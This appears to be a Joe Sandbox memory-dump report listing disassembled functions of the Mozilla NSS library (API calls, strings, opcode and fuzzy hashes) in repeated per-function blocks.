Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: eb4caabce176d4d7b310c395b7354b2c48b6f378fb39511d43c4f1ccbb31f916
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 0E01C8B59042A05BE6309F26FC01BCBB7A5EF41318F005435E95D87B11D632F41986D3

Function 6CACAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CAB3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CACAE42), ref: 6CAB30AA
Part of subcall function 6CAB3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAB30C7
Part of subcall function 6CAB3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CAB30E5
Part of subcall function 6CAB3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAB3116
Part of subcall function 6CAB3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAB312B
Part of subcall function 6CAB3090: PK11_DestroyObject.NSS3(?,?), ref: 6CAB3154
Part of subcall function 6CAB3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CAA99FF,?,?,?,?,?,?,?,?,?,6CAA2D6B,?), ref: 6CACAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CAA99FF,?,?,?,?,?,?,?,?,?,6CAA2D6B,?), ref: 6CACAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CAA2D6B,?,?,00000000), ref: 6CACAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CAA2D6B,?,?,00000000), ref: 6CACAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CAA2D6B,?,?), ref: 6CACAEA3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: a264be12192055ce7a0e2873e082d2dbd06dd3488cc3381ff816480d8fea9c07
Instruction ID: 49c1786d6fae7ea02a7c0f6ea1fe22730296c6b0dccd7d63c76e1adc3fb943d0
Opcode Fuzzy Hash: a264be12192055ce7a0e2873e082d2dbd06dd3488cc3381ff816480d8fea9c07
Instruction Fuzzy Hash: 7301A476B4403097E701A26CAD85ABB31AA8B8765CF080532F90AE7B41F625DDC942E3

Function 6CBBBDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CBB7AFE,?,?,?,?,?,?,?,?,6CBB798A), ref: 6CBBBDC3
free.MOZGLUE(?,?,6CBB7AFE,?,?,?,?,?,?,?,?,6CBB798A), ref: 6CBBBDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CBB7AFE,?,?,?,?,?,?,?,?,6CBB798A), ref: 6CBBBDE9
free.MOZGLUE(?,00000000,00000000,?,6CBB7AFE,?,?,?,?,?,?,?,?,6CBB798A), ref: 6CBBBE21
free.MOZGLUE(00000000,00000000,?,6CBB7AFE,?,?,?,?,?,?,?,?,6CBB798A), ref: 6CBBBE32

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 4cf533b6cef9d77153f635632a8cb7547a0df659b866a5b20c0f4fc4893210ca
Instruction ID: b087e7b83a0ba4d542da41bec2f8e6c6a168300eec77ded3499928dc35594a59
Opcode Fuzzy Hash: 4cf533b6cef9d77153f635632a8cb7547a0df659b866a5b20c0f4fc4893210ca
Instruction Fuzzy Hash: 151115B5B013509FDF11DF29D869B023BB9FB4B358B06002EE50AD7710E732A45ADB92

Function 6CBB7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6CBB7C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBB7C83
malloc.MOZGLUE(00000001), ref: 6CBB7C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CBB7C9F
PR_GetCurrentThread.NSS3 ref: 6CBB7CAD

Part of subcall function 6CB69BF0: TlsGetValue.KERNEL32(?,?,?,6CBB0A75), ref: 6CB69C07

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: 9660db4ce75b56a8af63ce0ffeaf8acd404c556cd15eae1d343c94ccb8e2215c
Instruction ID: 652bbd872db42f315cf850785ecd6291a8260cb5e3b05368559de7fbbf7a28e4
Opcode Fuzzy Hash: 9660db4ce75b56a8af63ce0ffeaf8acd404c556cd15eae1d343c94ccb8e2215c
Instruction Fuzzy Hash: DAF0C2B19106966BEB009F7BDC0996B7758EF01265B018479E80DE3B10EB34F114CAE5

Function 6CBBADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CBBA6D8), ref: 6CBBAE0D
free.MOZGLUE(?), ref: 6CBBAE14
DeleteCriticalSection.KERNEL32(6CBBA6D8), ref: 6CBBAE36
free.MOZGLUE(?), ref: 6CBBAE3D
free.MOZGLUE(00000000,00000000,?,?,6CBBA6D8), ref: 6CBBAE47

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: d258857631df02f3688d9b4d5274049c7a261874308802122d10740d16c8aa6d
Instruction ID: 30b2d83ff860100e5f6e73b37cd4ffd761e19a4cf590f85beda961207202ae38
Opcode Fuzzy Hash: d258857631df02f3688d9b4d5274049c7a261874308802122d10740d16c8aa6d
Instruction Fuzzy Hash: 21F0F675601A05A7CA209FA8E808917777CFF8A7747200328F13A83A80DB31F066CBD6

Function 6CA47C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA47D35

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA47D13, 6CA47D1F, 6CA47D47, 6CA47D53, 6CA47D5F
%s at line %d of [%.10s], xrefs: 6CA47D2E
database corruption, xrefs: 6CA47D29

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: f4bd1ae6c6e972178c3a576575ac582c18f09d16314f121a0328a613b9b943d0
Instruction ID: 9fbd181e0eac597021c907244a6d40ae042d779c88598a5c386d988a3944d7ac
Opcode Fuzzy Hash: f4bd1ae6c6e972178c3a576575ac582c18f09d16314f121a0328a613b9b943d0
Instruction Fuzzy Hash: 44311471E042A99BC710CF9EC8809B9B7E1EF48715B598196E444F7B86D370D891CBA0

Function 6CA36C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CA36D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA36D20
%s at line %d of [%.10s], xrefs: 6CA36D2F
database corruption, xrefs: 6CA36D2A

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 19d12974201607db143c954d8f3aba135b68cb01c0dfa80598d625f41ac63cf0
Instruction ID: b5817d124c330eacb547d63337a97a34978bea07b28f231c1486931a1aee7671
Opcode Fuzzy Hash: 19d12974201607db143c954d8f3aba135b68cb01c0dfa80598d625f41ac63cf0
Instruction Fuzzy Hash: F2210030600B259BC7118F1AD951B5AB7E6BF84358F28852CD84DDBF51E770F9888792

Function 6CB6CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CB6CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB6CC7B), ref: 6CB6CD7A
Part of subcall function 6CB6CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB6CD8E
Part of subcall function 6CB6CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB6CDA5
Part of subcall function 6CB6CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB6CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CB6CCB5
memcpy.VCRUNTIME140(6CC014F4,6CC002AC,00000090), ref: 6CB6CCD3
memcpy.VCRUNTIME140(6CC01588,6CC002AC,00000090), ref: 6CB6CD2B

Part of subcall function 6CA89AC0: socket.WSOCK32(?,00000017,6CA899BE), ref: 6CA89AE6
Part of subcall function 6CA89AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CA899BE), ref: 6CA89AFC

Part of subcall function 6CA90590: closesocket.WSOCK32(6CA89A8F,?,?,6CA89A8F,00000000), ref: 6CA90597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CB6CCB0

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: c765a9fdbcafa6f05324a24026231174e6976c42938f9d1b5ae9462e90a638db
Instruction ID: d78ef883f5ad68f653fc720e157a479b0893b1a08bbbd1e81374ef8187515b23
Opcode Fuzzy Hash: c765a9fdbcafa6f05324a24026231174e6976c42938f9d1b5ae9462e90a638db
Instruction Fuzzy Hash: 6A117CB1B002D09FDB009FAEC846766BAB8934631CF16102DE50AAFF41EB73D4048BD2

Function 6CAD1CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6CAD1CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CAD1CF1

Part of subcall function 6CBB09D0: PR_Now.NSS3 ref: 6CBB0A22
Part of subcall function 6CBB09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CBB0A35
Part of subcall function 6CBB09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CBB0A66
Part of subcall function 6CBB09D0: PR_GetCurrentThread.NSS3 ref: 6CBB0A70
Part of subcall function 6CBB09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CBB0A9D
Part of subcall function 6CBB09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CBB0AC8
Part of subcall function 6CBB09D0: PR_vsmprintf.NSS3(?,?), ref: 6CBB0AE8
Part of subcall function 6CBB09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBB0B19
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBB0B48
Part of subcall function 6CBB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBB0C76
Part of subcall function 6CBB09D0: PR_LogFlush.NSS3 ref: 6CBB0C7E

Strings

C_Initialize, xrefs: 6CAD1CD3
pInitArgs = 0x%p, xrefs: 6CAD1CEC

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize
API String ID: 1907330108-3943720641
Opcode ID: 26273d795c03c82b17c1c7bf3c4819f5d6c23ea9098a89297135f9ba80fca15a
Instruction ID: ed7268327a5be97ee347350d9bd8764d9940ecee387bf4e85e6863d46a2e2e5b
Opcode Fuzzy Hash: 26273d795c03c82b17c1c7bf3c4819f5d6c23ea9098a89297135f9ba80fca15a
Instruction Fuzzy Hash: C70192753011819FDF009F54DA49B6933B5EB8232EF0B4029E509D3611DF36E889CB91

Function 6CA37F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CA381DF
LeaveCriticalSection.KERNEL32(?), ref: 6CA38239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CA38255
sqlite3_free.NSS3(00000000), ref: 6CA38260

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: ebff28bd92521b10261a7eaa04e1fd9622b1880a29ed99b759926c7e451ead8a
Instruction ID: fef8cb3073321e775736315d402005a16b36289c51f45a127c7027f63622943a
Opcode Fuzzy Hash: ebff28bd92521b10261a7eaa04e1fd9622b1880a29ed99b759926c7e451ead8a
Instruction Fuzzy Hash: 57919F71B01258CBEB04CFE4E8697ADB7B1BF06309F18112FD41AEB654D7395985CB81

Function 6CB11D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CB11D8F

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB11DA6

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB11E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB11ED0

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: c88e97fec91ced2720f9c10d51e97866771a46ae10df5aa3de08e0e70c56df8d
Instruction ID: 841603edb2cdc04975975696c73ff601c6bba444fa6525da2db8f3cce90fdedb
Opcode Fuzzy Hash: c88e97fec91ced2720f9c10d51e97866771a46ae10df5aa3de08e0e70c56df8d
Instruction Fuzzy Hash: 27517A76A04349CFDB04CF98D884BAEBBB6FF59308F184129E8199BB50D731E945CB91

Function 6CB64FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CA485D2,00000000,?,?), ref: 6CB64FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB6500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB650C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB650D6

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 68ea6af918dbeca94beecea8ea3bfa3019cc71f1bb70b6fc486ad6617ed479e1
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 344190B2A002518BCB18CF19DCD17AAB7E1FF4431871D46ADC84ACBB02E775E895CB95

Function 6CA8FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6CA8FDFE), ref: 6CA8FFAD

Part of subcall function 6CA2CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA8F9C9,?,6CA8F4DA,6CA8F9C9,?,?,6CA5369A), ref: 6CA2CA7A
Part of subcall function 6CA2CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA2CB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6CA8FDFE), ref: 6CA8FFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6CA8FDFE), ref: 6CA9001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6CA8FDFE), ref: 6CA9006F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: a992fd27e1c1ad75005eec695e440a3ee5c78b70840f7c01f961cbe7f3ac17f3
Instruction ID: c40688c5aec1376e18f8bbd30db0042f491c8dbbf7473ee4fa1e35026b9d4fe1
Opcode Fuzzy Hash: a992fd27e1c1ad75005eec695e440a3ee5c78b70840f7c01f961cbe7f3ac17f3
Instruction Fuzzy Hash: 1141C171F002559FDB08DFA4E886ABEB7B5FF49309F08002DD816A3700DB369985CBA1

Function 6CB77DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB77E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB77EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB77EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CB77ED8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

